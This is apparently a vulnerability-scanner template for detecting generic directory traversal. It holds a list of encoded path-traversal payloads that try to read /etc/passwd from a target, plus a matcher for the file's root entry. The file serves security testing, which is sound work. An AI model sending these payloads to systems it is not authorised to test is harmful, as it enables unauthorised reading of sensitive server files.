id: directory-traversal info: name: Generic Directory Traversal author: pentest_swissky severity: high description: Detect basic directory traversal leading to a leak of sensitive files. tags: lfi,fuzz requests: - method: GET path: - "{{BaseURL}}/..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" - "{{BaseURL}}/./../../../../../../../../../../etc/passwd" - "{{BaseURL}}/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd" - "{{BaseURL}}/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd" - "{{BaseURL}}/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd" - "{{BaseURL}}/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd" - "{{BaseURL}}/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - "{{BaseURL}}/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:" part: body